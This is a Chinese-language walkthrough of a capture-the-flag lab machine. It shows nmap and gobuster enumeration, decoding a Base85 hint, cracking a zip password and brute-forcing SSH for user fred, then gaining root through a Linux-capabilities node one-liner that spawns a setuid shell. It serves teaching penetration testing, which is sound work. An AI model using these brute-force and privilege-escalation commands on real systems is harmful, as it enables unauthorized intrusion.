前言

本次文章只用于技术讨论，学习，切勿用于非法用途，用于非法用途与本人无关！

信息收集阶段

靶机：192.168.1.128

Kali攻击机：未知

目标：user权限和root权限

nmap -sn 192.168.1.0/24

nmap -A -p1-65535 192.168.1.3

开放了22端口和80端口：

漏洞利用阶段

访问下：白屏

http://192.168.1.3/

查看源代码：

有个tips：

If your eye was sharper, you would see everything in motion, lol

如果你的眼睛更锋利点，你会再运行中看到一切！

我怀疑访问这个网页有重定向！

BURP一下！并没有！

源代码中有张图片！

http://192.168.1.3/nietzsche.jpg

百度识图说着尼采！

接着目录扫描走起！！

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3/ -x txt,html,php,zip,bak,log

这个目录没扫到！换个大点的！！

gobuster dir -w /usr/share/wordlists/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.3/ -x txt,html,php,zip,bak

扫出了东西：

访问这个地址：http://192.168.1.3/notes-tips.txt

F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c

这是啥？如果你看到了编码，但分不清编码怎么办？

Base16：使用16个ASCII可打印字符（数字0-9和字母A-F），对任意字节数据进行编码。Base32：Base32编码是使用32个可打印字符（字母A-Z和数字2-7）对任意字节数据进行编码的方案，编码后的字符串不用区分大小写并排除了容易混淆的字符，可以方便地由人类使用并由计算机处理。

Base64：在Base64中的可打印字符包括字母A-Z、a-z、数字0-9，这样共有62个字符，此外两个可打印符号在不同的系统中而不同。一些如uuencode的其他编码方法。

Base85：Base85编码的目标是对二进制数据可打印的ASCII字符进行编码。

Base36：因为可以使用数字 0–9和拉丁字母 A–Z [1]（ISO基本拉丁字母）表示数字。

Base58：相比Base64，Base58不使用数字"0"，字母大写"O"，字母大写"I"，和字母小写"l"，以及"+"和"/"符号。

Base91:basE91需要91个字符来表示ASCII编码的二进制数据。 从94个可打印ASCII字符（0x21-0x7E）中，以下三个字符被省略以构建basE91字母：

Base62: 26个小写字母+26个大写字母+10个数字=62

这个编码是BASE85！

采用以下网站进行解码：

https://www.tools4noobs.com/online_tools/ascii85_decode/

salome doesn't want me, I'm so sad... i'm sure god is dead...

I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.

I must not forget to save it and put a good extension because I don't have much storage

前面那段话说明文件名叫：salome_and_me

后面那段话说没空间了：后缀是zip

salome_and_me.zip

访问http://192.168.1.3/salome_and_me.zip

解压时需要密码！

爆破一下：

参数解释：

[-D|--dictionary]             use a dictionary

[-u|--use-unzip]              use unzip to get out wrong passwords

[-p|--init-password string]   use string as initial password/file

密码是：turtle

解压后：

接着我们用fred为用户名，salome_and_me.txt中的词为密码字典进行爆破！

最终确认：schopenhauer为密码！

登录成功！

第一个flag：

cat user.txt

Inee*************ower

权限提升阶段

接着就是提权到root了！

老样子！

sudo -l和suid

find / -perm -u=s 2>/dev/null

提权函数网站走起！https://gtfobins.github.io/

然后，对能力进行了评估，并找到了一些可能的升级途径。

/usr/sbin/getcap -r / 2>/dev/null

https://gtfobins.github.io/

找到了一个路由使用这些能力，并找到一个二进制节点。

执行攻击向量并获取系统的根。

/usr/bin/node -e 'process.setuid(0);child_process.spawn("/bin/sh",{stdio:[0,1,2]})'

cat /root/root.txt

Imth********an